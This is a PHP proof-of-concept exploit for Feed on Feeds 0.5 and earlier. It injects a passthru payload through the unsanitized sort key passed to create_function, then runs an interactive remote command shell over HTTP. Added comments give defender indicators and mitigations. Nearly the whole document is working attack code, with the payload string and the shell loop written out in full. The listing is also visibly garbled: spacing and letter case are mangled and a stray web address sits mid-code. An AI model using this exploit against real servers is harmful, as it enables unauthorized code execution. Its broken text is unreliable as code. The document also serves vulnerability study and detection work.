<? Php
/*
------------------------------------------------------
Feed on Feeds <= 0.5 Remote PHP Code Injection Exploit
------------------------------------------------------
Author ......: EgiX
Mail ......: n0b0d13s [at] gmail [dot] com
Software link...: http://feedonfeeds.com/ or http://code.google.com/p/feed-on-feeds/
This PoC was written for educational purpose. Use it at your own risk.
Author will be not responsible for any damage.
[-] Vulnerable code in/fof-main.php
1091. function fof_multi_sort ($ tab, $ key, $ rev)
1092 .{
1093. if ($ rev)
1094 .{
1095. $ compare = create_function ('$ a, $ B', 'If (strtolower ($ ["'. $ key. '"]) = strtolower ($ B ["'. $ key. '"]) {return 0;} else {return (strtolower ($ ["'. $ key. '"])> strtolower ($ B ["'. $ key. '"])? -1: 1 ;}');
1096 .}
1097. else
1098 .{
1099. $ compare = create_function ('$ a, $ B', 'If (strtolower ($ ["'. $ key. '"]) = strtolower ($ B ["'. $ key. '"]) {return 0;} else {return (strtolower ($ ["'. $ key. '"]) <strtolower ($ B ["'. $ key. '"])? -1: 1 ;}');
1100 .}
1101.
1102. usort ($ tab, $ compare );
1103. return $ tab;
1104 .}
The $key parameter passed to fof_multi_sort() isn't properly sanitized before being used in a call
to create_function() at line 1095 or 1099. This can be exploited to inject and execute arbitrary PHP code.
Successful exploitation of this vulnerability requires authentication.
*/
// NOTE(review): the listing on this page is whitespace- and case-mangled by extraction
// and does not parse as written; the comments below describe what the original does.
// Script-wide settings: disable error reporting, remove the execution time limit,
// and give socket operations (see http_send) a 5-second default timeout.
Error_reporting (0 );
Set_time_limit (0 );
Ini_set ("default_socket_timeout", 5 );
/**
 * Sends one raw HTTP request over a plain TCP socket and returns the whole response.
 *
 * @param string $host   host name or IP to connect to (always port 80, no TLS)
 * @param string $packet complete request text, headers and body included
 * @return string        the response read to end of stream
 *
 * Terminates the script with die() if the connection cannot be opened; there is
 * no other error handling (fwrite failures and partial reads are not checked).
 */
Function http_send ($ host, $ packet)
{
If (! ($ Sock = fsockopen ($ host, 80 )))
Die ("\ n [-] No response from {$ host}: 80 \ n ");
Fwrite ($ sock, $ packet );
Return stream_get_contents ($ sock );
}
/**
 * Stores the injection payload in the account's feed_order preference via set-prefs.php.
 *
 * Reads the globals $host, $path, $user and $pass set by the main script. The request
 * is authenticated with the user_name / user_password_hash cookie pair, so a valid
 * account is required (see the header note above). The feed_order value is crafted
 * to break out of the string that fof_multi_sort() hands to create_function(), which
 * is the unsanitized-$key flaw described in the header. If the response mentions
 * login.php the credentials were rejected and the script dies.
 *
 * Defender notes:
 *  - Indicator: a POST to set-prefs.php whose feed_order value contains PHP syntax
 *    (quotes, "]);}") rather than a plain column name.
 *  - Mitigation: accept $key only from a fixed list of sortable fields and sort with
 *    a closure comparator; create_function() compiles code from strings and is
 *    removed in PHP 8.
 */
Function inject_php ()
{
Global $ host, $ path, $ user, $ pass;
$ Data = "feed_order = \"]);} print ('<'); passthru (base64_decode (\ $ _ SERVER [HTTP_CMD]); print ('>'); % 23 ";
$ Packet = "POST {$ path} set-prefs.php HTTP/1.0 \ r \ n ";
$ Packet. = "Host: {$ host} \ r \ n ";
$ Packet. = "Cookie: user_name = {$ user}; user_password_hash = {$ pass} \ r \ n ";
$ Packet. = "Content-Length:". strlen ($ data). "\ r \ n ";
$ Packet. = "Content-Type: application/x-www-form-urlencoded \ r \ n ";
$ Packet. = "Connection: close \ r \ n ";
$ Packet. = $ data;
// Auth failure is detected only indirectly: the app answers with a login.php redirect/link.
If (preg_match ("/login. php/", http_send ($ host, $ packet) die ("\ n [-] Incorrect username or password! \ N ");
}
// Banner.
Print "\ n + ---------------------------------------------------------------- + ";
Print "\ n | Feed on Feeds <= 0.5 Remote PHP Code Injection Exploit by EgiX | ";
Print "\ n + ---------------------------------------------------------------- + \ n ";
// Four positional arguments are required: host, application path, user name, password.
If ($ argc <5) www.2cto.com
{
Print "\ nUsage...: php $ argv [0]
Print "\ nExample...: php $ argv [0] localhost/user pass ";
Print "\ nExample...: php $ argv [0] localhost/fof/user pass \ n ";
Die ();
}
// Target parameters. The cookie credential is md5(password . user); every request
// below presents that value in user_password_hash, so the application appears to
// treat the hash itself as a bearer token (presumably replayable by anyone holding it).
$ Host = $ argv [1];
$ Path = $ argv [2];
$ User = $ argv [3];
$ Pass = md5 ($ argv [4]. $ user );
// Step 1: plant the payload in the account's preferences.
Inject_php ();
// Step 2: request template that triggers the stored preference. sidebar.php is
// presumably where the preference reaches fof_multi_sort() -- not verifiable here.
// The command travels in a custom Cmd: header; %s is filled by sprintf in the loop.
$ Packet = "GET {$ path} sidebar. php HTTP/1.0 \ r \ n ";
$ Packet. = "Host: {$ host} \ r \ n ";
$ Packet. = "Cookie: user_name = {$ user}; user_password_hash = {$ pass} \ r \ n ";
$ Packet. = "Cmd: % s \ r \ n ";
$ Packet. = "Connection: close \ r \ n ";
// Interactive loop: read a line from stdin ("exit" ends it), base64-encode it into the
// Cmd: header, and print whatever the response contains between '<' and '>' (the
// markers the stored payload wraps its output in). No match is treated as failure.
// Defender note: a non-standard Cmd: request header on sidebar.php requests, carrying a
// base64 value, is the network-visible indicator of this tool; the stored payload is the
// host-visible one (inspect the feed_order preference).
While (1)
{
Print "\ nfof-shell #";
If ($ cmd = trim (fgets (STDIN) = "exit") break;
Preg_match ("/<(. *)>/s", http_send ($ host, sprintf ($ packet, base64_encode ($ cmd), $ m )? Print $ m [1]: die ("\ n [-] Exploit failed! \ N ");
}
?>